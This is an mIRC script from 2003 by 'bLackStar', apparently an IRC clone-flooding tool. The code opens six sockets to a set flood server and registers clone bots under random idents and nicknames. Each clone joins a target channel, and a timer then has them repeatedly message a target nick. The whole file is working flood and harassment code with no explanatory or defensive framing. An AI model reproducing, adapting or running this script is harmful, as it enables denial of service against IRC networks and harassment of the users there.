   ;-----------------------------------------------------------;
   ;       C  O  C  U  K  S  U    M  A  V  Ý   v 2 . 5       ;
   ;   Feel The BlackStar Ready? Brain Enjoy!    ;
   ;          Copyright by bLackStar 2003 ©             ;
   ;-----------------------------------------------------------;

   alias dorukonline {
     .sockclose dorukonline*
     if ($sock(dorukonline,1) != $null) { .echo -s  | halt }
     unset %doruko
     .sockopen dorukonline %floodserver %fport
     .sockopen dorukonline1 %floodserver %fport
     .sockopen dorukonline2 %floodserver %fport
     .sockopen dorukonline3 %floodserver %fport
     .sockopen dorukonline4 %floodserver %fport
     .sockopen dorukonline5 %floodserver %fport
     .timer1 1 1 .dorukonline2
   }

   ;--------------------------------------------------------

   on *:sockopen:dorukonline:{
     if ($sockerr > 0) { return }
     .sockwrite -tn dorukonline USER www.kelebek.gen.tr
     .sockwrite -tn dorukonline NICK $read(feeli.exe)
     .sockwrite -tn dorukonline IDENTD $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(1,999)
     set -u1 %saldiriya $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(1,999) - $sock(dorukonline,1) - $sock(SALDIR) - /basla
   }

   ;--------------------------------------------------------

   alias dorukonline2 {
     unset %doruko
     goto yukle
     :yukle
     inc %doruko
     .sockwrite -tn dorukonline $+ %doruko USER $rand(a,z) $+ $rand(a,z)  $rand(a,z) $+ $rand(a,z)  $rand(a,z) $+ $rand(a,z)  $rand(a,z) $+ $rand(a,z)
     .sockwrite -tn dorukonline $+ %doruko NICK $read(feeli.exe)
     .sockwrite -tn dorukonline $+ %doruko IDENTD $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(1,999)
     .sockwrite -tn dorukonline $+ %doruko JOIN %fkanal
     if (%doruko == 5) { goto end }
     goto yukle
     :end
     /.timersaldir 0 60 /dorukonline3
   }

   ;--------------------------------------------------------

   alias dorukonline3 {
     unset %doruko
     goto saldir
     :saldir
     inc %doruko
     .sockwrite -tn dorukonline $+ %doruko privmsg %fnick Feel The BlackStar Ready? Brain Enjoy! (v2.0)
     if (%doruko == 5) { goto end }
     goto saldir
     :end
     unset %doruko
   }
